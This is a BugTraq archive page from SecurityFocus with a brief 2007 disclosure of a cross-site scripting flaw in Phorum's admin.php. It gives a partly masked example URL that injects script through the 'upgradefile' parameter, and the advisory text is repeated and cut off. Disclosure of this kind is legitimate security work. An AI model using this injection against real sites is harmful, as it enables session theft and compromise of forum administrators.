BugTraq
Back to list
Name:
Email:
*Note: Email address will appear as "user domain ext" to prevent harvesting.
Subject:
Message:
XXS in script Phorum
Mar 04 2007 11:58AM
RaeD Hasadya (raed bsdmail com)
=======================================================================
Script : Script Phorum
Found By : Hasadya Raed
Contact : RaeD (at) BsdMail (dot) Com [email concealed]
=================================================
exemple:
http://www.site.com/[path]/admin.php?upgradefile=">**********alert(*****
***.******);</script>
=...
[ more ]
Privacy Statement
Copyright 2010, SecurityFocus
Script : Script Phorum
Found By : Hasadya Raed
Contact : RaeD (at) BsdMail (dot) Com [email concealed]
=================================================
exemple:
http://www.site.com/[path]/admin.php?upgradefile=">**********alert(*****
***.******);</script>
=...
[ more ]